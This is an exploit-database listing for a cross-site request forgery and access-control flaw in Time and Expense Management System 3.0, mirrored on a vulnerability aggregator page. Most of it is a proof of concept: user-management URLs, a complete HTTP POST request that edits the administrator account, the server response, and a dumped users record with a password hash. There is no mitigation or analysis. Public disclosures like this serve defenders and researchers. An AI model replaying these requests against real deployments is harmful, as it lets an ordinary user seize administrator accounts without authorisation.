Registertime and expense management system 3.0 crosssite request forgery (add admin)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin) # Dork: N/A # Date: 2018-10-17 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.initechs.com/ # Software Link: http://sourceforge.net/projects/tems/files/latest # Version: 3.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # Description # Normal member has all rights. # POC: # 1) # #Add,edit,delete admin+all users... # http://localhost/[PATH]/index.php?action=ListUser # http://localhost/[PATH]/index.php?action=BrowseUser&uid=1 # Etc.. #Update admin.. POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 227 action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1 HTTP/1.1 200 OK Date: Wed, 17 Oct 2018 00:46:35 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 10 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # /* `exploitdb`.`users` */ # $users = array( # array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => '10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe') # );
Time and expense management system 3.0 crosssite request forgery (add admin) Vulnerability / Exploit Source : Time and expense management system 3.0 crosssite request forgery (add admin)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes